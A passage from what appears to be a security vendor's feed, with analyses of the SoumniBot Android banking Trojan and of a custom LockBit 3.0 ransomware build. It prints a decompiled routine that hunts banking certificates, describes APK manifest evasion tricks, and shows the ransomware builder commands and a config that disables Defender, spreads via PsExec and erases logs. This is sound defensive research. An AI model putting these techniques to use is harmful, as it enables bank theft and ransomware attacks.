  653. <h2 id="soumnibot-obfuscation-exploiting-bugs-in-the-android-manifest-extraction-and-parsing-procedure">SoumniBot obfuscation: exploiting bugs in the Android manifest extraction and parsing procedure</h2>
  654. <p>Any APK file is a ZIP archive with AndroidManifest.xml in the root folder. This file contains information about the declared components, permissions and other app data, and helps the operating system to retrieve information about various app entry points. Just like the operating system, the analyst starts by inspecting the manifest to find the entry points, which is where code analysis should start. This is likely what motivated the developers of SoumniBot to research the implementation of the manifest parsing and extracion routine, where they found several interesting opportunities to obfuscate APKs.</p>
  655. <h3 id="technique-1-invalid-compression-method-value">Technique 1: Invalid Compression method value</h3>
  656. <p>This is a <a href="" target="_blank" rel="noopener">relatively well-known technique</a> used by various types of malware including SoumniBot and associated with the way manifests are unpacked. In <em>libziparchive</em> library, the standard unarchiving function permits only two <em>Compression method</em> values in the record header: 0x0000 (STORED, that is uncompressed) и 0x0008 (DEFLATED, that is compressed with <em>deflate</em> from the <em>zlib</em> library), or else it returns an error.</p>
  657. <div id="attachment_112415" style="width: 749px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112415" src="" alt="libziparchive unarchiving algorithm" width="739" height="498" class="size-full wp-image-112415" srcset=" 739w, 300w, 519w, 416w" sizes="(max-width: 739px) 100vw, 739px" /></a><p id="caption-attachment-112415" class="wp-caption-text">libziparchive unarchiving algorithm</p></div>
  658. <p>Yet, instead of using this function, the developers of Android chose to implement an alternate scenario, where the value of the <em>Compression method</em> field is validated incorrectly.</p>
  659. <div id="attachment_112416" style="width: 761px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112416" src="" alt="Manifest extraction procedure" width="751" height="693" class="size-full wp-image-112416" srcset=" 751w, 300w, 379w, 740w, 303w" sizes="(max-width: 751px) 100vw, 751px" /></a><p id="caption-attachment-112416" class="wp-caption-text">Manifest extraction procedure</p></div>
  660. <p>If the APK parser comes across any <em>Compression method</em> value but 0x0008 (DEFLATED) in the APK for the AndroidManifest.xml entry, it considers the data uncompressed. This allows app developers to put any value except 8 into <em>Compression method</em> and write uncompressed data. Although any unpacker that correctly implements compression method validation would consider a manifest like that invalid, the Android APK parser recognizes it correctly and allows the application to be installed. The image below illustrates the way the technique is executed in the file <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b456430b4ed0879271e6164a7c0e4f6e</a>.</p>
  661. <div id="attachment_112417" style="width: 630px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112417" src="" alt="Invalid Compression method value followed by uncompressed data" width="620" height="617" class="size-full wp-image-112417" srcset=" 620w, 300w, 150w, 352w, 281w, 50w" sizes="(max-width: 620px) 100vw, 620px" /></a><p id="caption-attachment-112417" class="wp-caption-text">Invalid Compression method value followed by uncompressed data</p></div>
  662. <h3 id="technique-2-invalid-manifest-size">Technique 2: Invalid manifest size</h3>
  663. <p>Let&#8217;s use the file <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0318b7b906e9a34427bf6bbcf64b6fc8</a> as an example to review the essence of this technique. The header of AndroidManifest.xml entry inside the ZIP archive states the size of the manifest file. If the entry is stored uncompressed, it will be copied from the archive unchanged, even if its size is stated incorrectly. The manifest parser ignores any overlay, that is information following the payload that&#8217;s unrelated to the manifest. The malware takes advantage of this: the size of the archived manifest stated in it exceeds its actual size, which results in overlay, with some of the archive content being added to the unpacked manifest. Stricter manifest parsers wouldn&#8217;t be able to read a file like that, whereas the Android parser handles the invalid manifest without any errors.</p>
  664. <div id="attachment_112418" style="width: 617px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112418" src="" alt="The stated size of the manifest is much larger than its actual size" width="607" height="482" class="size-full wp-image-112418" srcset=" 607w, 300w, 441w, 353w" sizes="(max-width: 607px) 100vw, 607px" /></a><p id="caption-attachment-112418" class="wp-caption-text">The stated size of the manifest is much larger than its actual size</p></div>
  665. <p>Note that although live devices interpret these files as valid, <a href="" target="_blank" rel="noopener">apkanalyzer</a>, Google&#8217;s own official utility for analyzing assembled APKs, cannot handle them. We have notified Google accordingly.</p>
  666. <h3 id="technique-3-long-namespace-names">Technique 3: Long namespace names</h3>
  667. <p>The SoumniBot malware family, for example the file <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fa8b1592c9cda268d8affb6bceb7a120</a>, has used this technique as well. The manifest contains very long strings, used as the names of XML namespaces.</p>
  668. <div id="attachment_112419" style="width: 1240px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112419" src="" alt="Very long strings in the manifest…" width="1230" height="864" class="size-full wp-image-112419" srcset=" 1230w, 300w, 1024w, 768w, 498w, 740w, 399w, 800w" sizes="(max-width: 1230px) 100vw, 1230px" /></a><p id="caption-attachment-112419" class="wp-caption-text">Very long strings in the manifest…</p></div>
  669. <div id="attachment_112420" style="width: 518px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112420" src="" alt="…used as namespace names" width="508" height="69" class="size-full wp-image-112420" srcset=" 508w, 300w, 500w" sizes="(max-width: 508px) 100vw, 508px" /></a><p id="caption-attachment-112420" class="wp-caption-text">…used as namespace names</p></div>
  670. <p>Manifests that contain strings like these become unreadable for both humans and programs, with the latter may not be able to allocate enough memory to process them. The manifest parser in the OS itself completely ignores namespaces, so the manifest is handled without errors.</p>
  671. <h2 id="whats-under-the-obfuscation-soumnibots-functionality">What&#8217;s under the obfuscation: SoumniBot&#8217;s functionality</h2>
  672. <p>When started, the application requests a configuration with two parameters, mainsite и mqtt, from the server, whose address being a hardcoded constant.</p>
  673. <div id="attachment_112421" style="width: 459px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112421" src="" alt="Parameter request" width="449" height="266" class="size-full wp-image-112421" srcset=" 449w, 300w" sizes="(max-width: 449px) 100vw, 449px" /></a><p id="caption-attachment-112421" class="wp-caption-text">Parameter request</p></div>
  674. <p>Both parameters are server addresses, which the malware needs for proper functioning. The mainsite server receives collected data, and mqtt provides MQTT messaging functionality for receiving commands. If the source server did not provide these parameters for some reason, the application will use the default addresses, also stored in the code.</p>
  675. <p>After requesting the parameters, the application starts a malicious service. If it cannot start or stops for some reason, a new attempt is made every 16 minutes. When run for the first time, the Trojan hides the app icon to complicate removal, and then starts to upload data in the background from the victim&#8217;s device to mainsite every 15 seconds. The data includes the IP address, country deduced from that, contact and account lists, SMS and MMS messages, and the victim&#8217;s ID generated with the help of the <a href="" target="_blank" rel="noopener">trustdevice-android</a> library. The Trojan also subscribes to messages from the MQTT server to receive the commands described below.</p>
  676. <table width="100%">
  677. <tbody>
  678. <tr>
  679. <td style="text-align: center" width="10%"><strong>#</strong></td>
  680. <td style="text-align: center" width="50%"><strong>Description</strong></td>
  681. <td style="text-align: center" width="40%"><strong>Parameters</strong></td>
  682. </tr>
  683. <tr>
  684. <td style="text-align: center">0</td>
  685. <td>Sends information about the infected device: phone number, carrier, etc., and the Trojan version, followed by all of the victim&#8217;s SMS messages, contacts, accounts, photos, videos and online banking digital certificates.</td>
  686. <td>&#8211;</td>
  687. </tr>
  688. <tr>
  689. <td style="text-align: center">1</td>
  690. <td>Sends the victim&#8217;s contact list.</td>
  691. <td>&#8211;</td>
  692. </tr>
  693. <tr>
  694. <td style="text-align: center">2</td>
  695. <td>Deletes a contact on the victim&#8217;s device.</td>
  696. <td><em>data</em>: the name of the contact to delete</td>
  697. </tr>
  698. <tr>
  699. <td style="text-align: center">3</td>
  700. <td>Sends the victim&#8217;s SMS and MMS messages.</td>
  701. <td>&#8211;</td>
  702. </tr>
  703. <tr>
  704. <td style="text-align: center">4</td>
  705. <td>A debugging command likely to be replaced with sending call logs in a new version.</td>
  706. <td>&#8211;</td>
  707. </tr>
  708. <tr>
  709. <td style="text-align: center">5</td>
  710. <td>Sends the victim&#8217;s photos and videos.</td>
  711. <td>&#8211;</td>
  712. </tr>
  713. <tr>
  714. <td style="text-align: center">8</td>
  715. <td>Sends an SMS message.</td>
  716. <td><em>data</em>: ID that the malware uses to receive a message to forward. The Trojan sends the ID to mainsite and gets message text in return.</td>
  717. </tr>
  718. <tr>
  719. <td style="text-align: center">24</td>
  720. <td>Sends a list of installed apps.</td>
  721. <td>&#8211;</td>
  722. </tr>
  723. <tr>
  724. <td style="text-align: center">30</td>
  725. <td>Adds a new contact on the device.</td>
  726. <td><em>name</em>: contact name; <em>phoneNum</em>: phone number</td>
  727. </tr>
  728. <tr>
  729. <td style="text-align: center">41</td>
  730. <td>Gets ringtone volume levels.</td>
  731. <td>&#8211;</td>
  732. </tr>
  733. <tr>
  734. <td style="text-align: center">42</td>
  735. <td>Turns silent mode on or off.</td>
  736. <td><em>data</em>: a flag set to 1 to turn on silent mode and to 0 to turn it off</td>
  737. </tr>
  738. <tr>
  739. <td style="text-align: center">99</td>
  740. <td>Sends a <em>pong</em> message in response to an MQTT ping request.</td>
  741. <td>&#8211;</td>
  742. </tr>
  743. <tr>
  744. <td style="text-align: center">100</td>
  745. <td>Turns on debug mode.</td>
  746. <td>&#8211;</td>
  747. </tr>
  748. <tr>
  749. <td style="text-align: center">101</td>
  750. <td>Turns off debug mode.</td>
  751. <td>&#8211;</td>
  752. </tr>
  753. </tbody>
  754. </table>
  755. <p>The command with the number 0 is worth special mention. It searches, among other things, external storage media for .key and .der files that contain paths to /NPKI/yessign.</p><pre class="crayon-plain-tag">public static List getAllBankingKeys(Context context) {
  756. List list = new ArrayList();
  757. Cursor cursor = context.getContentResolver().query(MediaStore.Files.getContentUri("external"),
  758. new String[]{"_id", "mime_type", "_size", "date_modified", "_data"},
  759. "(_data LIKE \'%.key\' OR _data LIKE \'%.der\')", null, null);
  760. int index = cursor == null ? 0 : cursor.getColumnIndexOrThrow("_data");
  761. if (cursor != null) {
  762. while (cursor.moveToNext()) {
  763. String s = cursor.getString(index);
  764. If (!s.contains("/NPKI/yessign")) {
  765. continue;
  766. }
  767. Logger.log("path is:" + s);
  768. list.add(s);
  769. break;
  770. }
  771. cursor.close();
  772. }
  773. return list;
  774. }</pre><p>
  775. If the application finds files like that, it copies the directory where they are located into a ZIP archive and sends it to the C&#038;C server. These files are digital certificates issued by Korean banks to their clients and used for signing in to online banking services or confirming banking transactions.  This technique is quite uncommon for Android banking malware. Kaspersky security solutions detect SoumniBot despite its sophisticated obfuscation techniques, and assign to it the verdict of Trojan-Banker.AndroidOS.SoumniBot.</p>
  776. <h2 id="conclusion">Conclusion</h2>
  777. <p>Malware creators seek to maximize the number of devices they infect without being noticed. This motivates them to look for new ways of complicating detection. The developers of SoumniBot unfortunately succeeded due to insufficiently strict validations in the Android manifest parser code.</p>
  778. <p>We have detailed the techniques used by this Trojan, so that researchers around the world are aware of the tactics, which other types of malware might borrow in the future. Besides the unconventional obfuscation, SoumniBot is notable for stealing Korean online banking keys, which we rarely observe in Android bankers. This feature lets malicious actors empty unwitting victims&#8217; wallets and circumvent authentication methods used by banks. To avoid becoming a victim of malware like that, we recommend using a reliable security solution on your smartphone to detect the Trojan and prevent it from being installed despite all its tricks.</p>
  779. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  780. <p><strong>MD5</strong><br />
  781. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0318b7b906e9a34427bf6bbcf64b6fc8</a><br />
  782. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">00aa9900205771b8c9e7927153b77cf2</a><br />
  783. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b456430b4ed0879271e6164a7c0e4f6e</a><br />
  784. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fa8b1592c9cda268d8affb6bceb7a120</a></p>
  785. <p><strong>C&amp;C</strong><br />
  786. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https[://]google.kt9[.]site</a><br />
  787. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https[://]dbdb.addea.workers[.]dev</a></p>
  788. ]]></content:encoded>
  789. <wfw:commentRss></wfw:commentRss>
  790. <slash:comments>0</slash:comments>
  791. <media:content xmlns:media="" url="" width="1885" height="1060"><media:keywords>full</media:keywords></media:content>
  792. <media:content xmlns:media="" url="" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
  793. <media:content xmlns:media="" url="" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  794. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  795. </item>
  796. <item>
  797. <title>Using the LockBit builder to generate targeted ransomware</title>
  798. <link></link>
  799. <comments></comments>
  800. <dc:creator><![CDATA[Eduardo Ovalle, Francesco Figurelli, Cristian Souza, Ashley Muñoz]]></dc:creator>
  801. <pubDate>Mon, 15 Apr 2024 10:00:28 +0000</pubDate>
  802. <category><![CDATA[Malware descriptions]]></category>
  803. <category><![CDATA[Data Encryption]]></category>
  804. <category><![CDATA[Incident response]]></category>
  805. <category><![CDATA[LockBit]]></category>
  806. <category><![CDATA[Malware]]></category>
  807. <category><![CDATA[Malware Technologies]]></category>
  808. <category><![CDATA[Ransomware]]></category>
  809. <category><![CDATA[Targeted attacks]]></category>
  810. <category><![CDATA[Trojan]]></category>
  811. <category><![CDATA[APT (Targeted attacks)]]></category>
  812. <category><![CDATA[Windows malware]]></category>
  813. <guid isPermaLink="false"></guid>
  815. <description><![CDATA[Kaspersky researchers revisit the leaked LockBit 3.0 builder and share insights into a real-life incident involving a custom targeted ransomware variant created with this builder.]]></description>
  816. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>The previous Kaspersky <a href="" target="_blank" rel="noopener">research</a> focused on a detailed analysis of the LockBit 3.0 builder leaked in 2022. Since then, attackers have been able to generate customized versions of the threat according to their needs. This opens up numerous possibilities for malicious actors to make their attacks more effective, since it is possible to configure network spread options and defense-killing functionality. It becomes even more dangerous if the attacker has valid privileged credentials in the target infrastructure.</p>
  817. <p>In a recent incident response engagement, we faced this exact scenario: the adversary was able to get the administrator credential in plain text. They generated a custom version of the ransomware, which used the aforementioned account credential to spread across the network and perform malicious activities, such as killing Windows Defender and erasing Windows Event Logs in order to encrypt the data and cover its tracks.</p>
  818. <p>In this article, we revisit the LockBit 3.0 builder files and delve into the adversary&#8217;s steps to maximize impact on the network. In addition, we provide a list of preventive activities that can help network administrators to avoid this kind of threat.</p>
  819. <h2 id="revisiting-the-lockbit-3-0-builder-files">Revisiting the LockBit 3.0 builder files</h2>
  820. <p>The LockBit 3.0 builder has significantly simplified creating customized ransomware. The image below shows the files that constitute it. As we can see, <strong>keygen.exe</strong> generates public and private keys used for encryption and decryption. After that, <strong>builder.exe</strong> generates the variant according to the options set in the <strong>config.json</strong> file.</p>
  821. <div id="attachment_112388" style="width: 930px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112388" class="size-full wp-image-112388" src="" alt="LockBit builder files" width="920" height="393" srcset=" 920w, 300w, 768w, 819w, 740w, 655w, 800w" sizes="(max-width: 920px) 100vw, 920px" /></a><p id="caption-attachment-112388" class="wp-caption-text">LockBit builder files</p></div>
  822. <p>This whole process is automated with the <strong>Build.bat</strong> script, which does the following:</p><pre class="crayon-plain-tag">IF exist Build (ERASE /F /Q Build\*.*) ELSE (mkdir Build)
  823. keygen -path Build -pubkey pub.key -privkey priv.key
  824. builder -type dec -privkey Build\priv.key -config config.json -ofile Build\LB3Decryptor.exe
  825. builder -type enc -exe -pubkey Build\pub.key -config config.json -ofile Build\LB3.exe
  826. builder -type enc -exe -pass -pubkey Build\pub.key -config config.json -ofile Build\LB3_pass.exe
  827. builder -type enc -dll -pubkey Build\pub.key -config config.json -ofile Build\LB3_Rundll32.dll
  828. builder -type enc -dll -pass -pubkey Build\pub.key -config config.json -ofile Build\LB3_Rundll32_pass.dll
  829. builder -type enc -ref -pubkey Build\pub.key -config config.json -ofile Build\LB3_ReflectiveDll_DllMain.dll</pre><p>
  830. The <strong>config.json</strong> file allows enabling impersonation features (<strong>impersonation</strong>) and defining accounts to impersonate (<strong>impers_accounts</strong>). In the example below, the administrator account was used for impersonation. The configuration also allows enabling the encryption of network shares (<strong>network_shares</strong>), killing Windows Defender (<strong>kill_defender</strong>), and spreading across the network via PsExec (<strong>psexec_netspread</strong>). After a successful infection, the malicious sample can delete Windows Event Logs (<strong>delete_eventlogs</strong>) to cover its tracks.</p>
  831. <div id="attachment_112389" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112389" class="size-large wp-image-112389" src="" alt="Custom configuration" width="1024" height="508" srcset=" 1024w, 300w, 768w, 706w, 740w, 565w, 800w, 1382w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112389" class="wp-caption-text">Custom configuration</p></div>
  832. <p>Besides this, the builder allows the attacker to choose which files, in which directories, and in which systems they do not want to encrypt. If the attacker knows their way around the target infrastructure, they can generate malware tailored to the specific configuration of the target&#8217;s network architecture, such as important files, administrative accounts, and critical systems. The images below show the process of generating customized ransomware according to the above configuration, and the resulting files. As we can see, <strong>LB3.exe</strong> is the main file. This is the artifact that will be delivered to the victim. The builder also generates <strong>LB3Decryptor.exe</strong> for recovering the files, as well as several different variants of the main file. For example, <strong>LB3_pass.exe</strong> is a password-protected version of the ransomware, while the reflective DLL can be used to bypass the standard operating system loader and inject malware directly into memory. The TXT files contain instructions on how to execute the password-protected files.</p>
  833. <div id="attachment_112390" style="width: 640px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112390" class="size-full wp-image-112390" src="" alt="Creation of a customized LockBit version" width="630" height="148" srcset=" 630w, 300w" sizes="(max-width: 630px) 100vw, 630px" /></a><p id="caption-attachment-112390" class="wp-caption-text">Creation of a customized LockBit version</p></div>
  834. <div id="attachment_112391" style="width: 627px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112391" class="size-full wp-image-112391" src="" alt="Generated LockBit files" width="617" height="303" srcset=" 617w, 300w, 570w" sizes="(max-width: 617px) 100vw, 617px" /></a><p id="caption-attachment-112391" class="wp-caption-text">Generated LockBit files</p></div>
  835. <p>When we executed this custom build on a virtual machine, it performed its malicious activities and generated custom ransom note files. In real-life scenarios, the note will include details on how the victim should contact the attackers to obtain a decryptor. It is worth noting that negotiating with the attackers and paying ransom should not be an option. Besides the ethical issues involved, there is doubt whether a tool for recovering the files will ever be provided.</p>
  836. <div id="attachment_112392" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112392" class="size-large wp-image-112392" src="" alt="Custom ransom note" width="1024" height="695" srcset=" 1024w, 300w, 768w, 516w, 740w, 413w, 800w, 1135w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112392" class="wp-caption-text">Custom ransom note</p></div>
  837. <p>However, as we generated the ransomware sample and a corresponding decryptor ourselves in a controlled lab environment, we were able to test if the latter actually worked. We tried to decrypt our encrypted files and found out that if the decryptor for the sample was available, it was indeed able to recover the files, as shown in the image below.</p>
  838. <div id="attachment_112393" style="width: 640px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112393" class="size-full wp-image-112393" src="" alt="LB3Decryptor execution" width="630" height="229" srcset=" 630w, 300w" sizes="(max-width: 630px) 100vw, 630px" /></a><p id="caption-attachment-112393" class="wp-caption-text">LB3Decryptor execution</p></div>
  839. <p>That said, we must once again underscore that even a correctly working decryptor is no guarantee that the attackers will play fair.</p>
  840. <h2 id="the-recent-lockbit-takedown-and-custom-lockbit-builds">The recent LockBit takedown and custom LockBit builds</h2>
  841. <p>In February 2024, the international law enforcement task force <a href="" target="_blank" rel="noopener">Operation Cronos</a> gained visibility into LockBit&#8217;s operations after taking the group down. The collaborative action involved law enforcement agencies from 10 countries, which seized the infrastructure and took control of the LockBit administration environment. However, a few days after the operation, the ransomware group <a href="" target="_blank" rel="noopener">announced</a> that they were back in action.</p>
  842. <p>The takedown operation allowed LEAs to seize the group&#8217;s infrastructure, obtain private decryption keys and prepare a <a href="" target="_blank" rel="noopener">decryption toolset</a> based on a known-victim ID list obtained by the authorities. The <strong>check_decryption_id</strong> utility checks if the ransom ID enabled for the victim is on the list of known decryption keys:</p>
  843. <div id="attachment_112394" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112394" class="size-large wp-image-112394" src="" alt="check_decryption_id.exe execution" width="1024" height="179" srcset=" 1024w, 300w, 768w, 740w, 800w, 1468w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112394" class="wp-caption-text">check_decryption_id.exe execution</p></div>
  844. <p>The <strong>check_decrypt</strong> tool assesses decryptability: while there is a possibility that the files will be recovered, the outcome of the process depends on multiple conditions, and this tool just checks which of these conditions are met in the systems being analyzed. A CSV file is created, listing files that can be decrypted and providing an email address to reach out to for further instructions on restoring the files:</p>
  845. <div id="attachment_112395" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112395" class="size-large wp-image-112395" src="" alt="check_decrypt.exe execution" width="1024" height="411" srcset=" 1024w, 300w, 768w, 872w, 740w, 697w, 800w, 1153w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112395" class="wp-caption-text">check_decrypt.exe execution</p></div>
  846. <p>This toolset caught our attention because we had investigated several cases relating to the LockBit threat. We normally recommend that our customers save their encrypted critical files and wait for an opportunity to decrypt them with the help of threat researches or artifacts seized by the authorities, which is merely a matter of time. We ran victim IDs and encrypted files analyzed by our team through the decryption tool, but most of them showed the same result:</p>
  847. <div id="attachment_112396" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112396" class="size-large wp-image-112396" src="" alt="Testing the tool on a victim ID obtained by our team" width="1024" height="162" srcset=" 1024w, 300w, 768w, 740w, 800w, 1456w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112396" class="wp-caption-text">Testing the tool on a victim ID obtained by our team</p></div>
  848. <p>The <strong>check_decrypt</strong> also confirmed that it was not possible to decrypt the files by using the database of known keys:</p>
  849. <div id="attachment_112397" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112397" class="size-large wp-image-112397" src="" alt="Testing the check_decrypt.exe tool on encrypted files" width="1024" height="499" srcset=" 1024w, 300w, 768w, 718w, 740w, 574w, 800w, 1466w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112397" class="wp-caption-text">Testing the check_decrypt.exe tool on encrypted files</p></div>
  850. <p>Our analysis and previous research confirmed that files encrypted with a payload generated with the help of the leaked LockBit builder could not be decrypted with existing decryption tools, essentially because the independent groups behind these attacks did not share their private keys with the RaaS operator.</p>
  851. <h2 id="geography-of-the-leaked-lockbit-builder-based-attacks">Geography of the leaked LockBit builder-based attacks</h2>
  852. <p>Custom LockBit builds created with the leaked builder were involved in a number of incidents all over the world. These attacks were most likely unrelated and executed by independent actors. The leaked builder apparently has been used by LockBit ransomware competitors to target companies in the Commonwealth of Independent States, violating the group&#8217;s number one rule to avoid compromising CIS nationals. This <a href="" target="_blank" rel="noopener">triggered a discussion</a> on the dark web, where LockBit operators tried to explain that they had nothing to do with these attacks.</p>
  853. <p>In our incident response practice, we have come across ransomware samples created with the help of the leaked builder in incidents in Russia, Italy, Guinea-Bissau, and Chile. Although the builder provides a number of customization options, as we have shown above, most of the attacks used the default or slightly modified configuration. However, one incident stood out.</p>
  854. <h2 id="a-real-life-incident-response-case-involving-a-custom-lockbit-build">A real-life incident response case involving a custom LockBit build</h2>
  855. <p>In a recent incident response engagement, we faced a ransomware scenario involving a LockBit sample built with the leaked builder and featuring impersonation and network spread capabilities we had not seen before. The attacker was able to exploit an internet-facing server that exposed multiple sensitive ports. Somehow, they were able to obtain the administrator password – we believe that it may have been stored in plain text inside a file, or that the attacker may have used social engineering. Then, the adversary generated custom ransomware using the privileged account they had access to. Our team was able to obtain the relevant fields present in the <strong>config.json</strong> file that the attacker used:</p><pre class="crayon-plain-tag">"impersonation": true,
  856. "impers_accounts": "Administrator:************",
  857. "local_disks": true,
  858. "network_shares": true,
  859. "running_one": false,
  860. "kill_defender": true,
  861. "psexec_netspread": true,
  862. "delete_eventlogs": true,</pre><p>
  863. As we can see, the custom version has the ability to impersonate the administrator account, affect network shares, and spread easily across the network via PsExec.</p>
  864. <p>Moreover, it is configured to run more than once on each host. One of the first steps that the executable does when started is check for, and create, a unique mutex based on a hash sum of the ransomware public key in the format: <strong>&#8220;Global\%.8x%.8x%.8x%.8x%.8x&#8221;</strong>. If the <strong>running_one</strong> flag is set to true in the configuration and the mutex is already present in the operating system, the process will exit.</p>
  865. <p>In our case, the configuration allowed concurrent executions of several ransomware instances on the same host. This behavior, combined with the use of configuration flags for automatic network propagation with high-privileged domain credentials, led to an uncontrolled avalanche effect: each host that got infected then started trying to infect other hosts on the network, including those already infected. From an incident response point of view, this means finding evidence, if available, of different origins for the same threat. See below the evidence found on one host of remote service creation by PsExec with authentication completed from multiple infected hosts.</p>
  866. <div id="attachment_112398" style="width: 744px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112398" class="size-full wp-image-112398" src="" alt="Remote service creation by PsExec" width="734" height="766" srcset=" 734w, 287w, 335w, 268w" sizes="(max-width: 734px) 100vw, 734px" /></a><p id="caption-attachment-112398" class="wp-caption-text">Remote service creation by PsExec</p></div>
  867. <p>Although this evidence was present in the infected systems, most of the logs had been deleted by the ransomware immediately after the initial infection. Because of that, it was not possible to determine how the attacker was able to gain access to the server and to the administrator password. The remote service creation logs remained because when the malware was performing lateral movement on the network, it generated new logs, which it did not delete, and which were helpful in detecting its spread across the infrastructure.</p>
  868. <div id="attachment_112399" style="width: 877px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112399" class="size-full wp-image-112399" src="" alt="Event logs cleared" width="867" height="302" srcset=" 867w, 300w, 768w, 740w, 804w, 800w" sizes="(max-width: 867px) 100vw, 867px" /></a><p id="caption-attachment-112399" class="wp-caption-text">Event logs cleared</p></div>
  869. <p>By analyzing some of the traces that were not erased on the initial affected server, we identified compressed Gzip data in a memory stream. The data was encoded in Base64. After decoding and decompression, we found evidence of the use of Cobalt Strike. We were able to identify the C2 server used by the attacker to communicate with the affected machine and promptly sent this indicator to the customer for blacklisting.</p>
  870. <p>We also spotted the use of the <a href="" target="_blank" rel="noopener">SessionGopher</a> script. This tool uses WMI to extract saved session information for remote desktop access tools, such as WinSCP, PuTTY, FileZilla, and Microsoft Remote Desktop. This is accomplished by querying <strong>HKEY_USERS</strong> for PuTTY, WinSCP, and Remote Desktop saved sessions. In <strong>Thorough</strong> mode, the script can identify <strong>.ppk</strong>, <strong>.rdp</strong>, and <strong>.sdtid</strong> files in order to extract private keys and session information. It can be run remotely by using the <strong>-iL</strong> option followed by the list of computers. The <strong>-AllDomain</strong> flag allows running it against all AD-joined computers. As shown in the image below, the script can easily extract saved passwords for remote connections. The results can be exported to a CSV file for later use.</p>
  871. <div id="attachment_112400" style="width: 604px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112400" class="size-full wp-image-112400" src="" alt="Password extraction using SessionGopher" width="594" height="688" srcset=" 594w, 259w, 302w, 242w" sizes="(max-width: 594px) 100vw, 594px" /></a><p id="caption-attachment-112400" class="wp-caption-text">Password extraction using SessionGopher</p></div>
  872. <p>Although SessionGopher is designed for collecting stored credentials, it was not the tool used by the attackers for initial credential dumping. Instead, they employed SessionGopher to collect additional credentials and services in the infrastructure at a later stage.</p>
  873. <p>Once we identified the C2 domains and some other IP addresses related to the attacker and extracted details about the impersonated accounts and tools implemented for automatic deployment, the customer changed all affected users&#8217; credentials and configured security controls to avoid PsExec execution, thus stopping the infection. Monitoring network and user account activities allowed us to identify the infected systems and isolate them for analysis and recovery.</p>
  874. <p>This case shows an interesting combination of techniques used to gain and maintain access to the target network, as well as encrypt important data and impair defenses. Below are the TTPs identified for this scenario.</p>
  875. <table width="100%">
  876. <tbody>
  877. <tr>
  878. <td width="35%"><strong>Tactic</strong></td>
  879. <td width="40%"><strong>Technique</strong></td>
  880. <td width="25%"><strong>ID</strong></td>
  881. </tr>
  882. <tr>
  883. <td>Impact</td>
  884. <td>Data Encrypted for Impact</td>
  885. <td><a href="" target="_blank" rel="noopener">T1486</a></td>
  886. </tr>
  887. <tr>
  888. <td>Defense Evasion, Persistence, Privilege Escalation, Initial Access</td>
  889. <td>Valid Accounts</td>
  890. <td><a href="" target="_blank" rel="noopener">T1078.002</a></td>
  891. </tr>
  892. <tr>
  893. <td>Credential Access</td>
  894. <td>Credentials from Password Stores</td>
  895. <td><a href="" target="_blank" rel="noopener">T1555</a></td>
  896. </tr>
  897. <tr>
  898. <td>Lateral Movement</td>
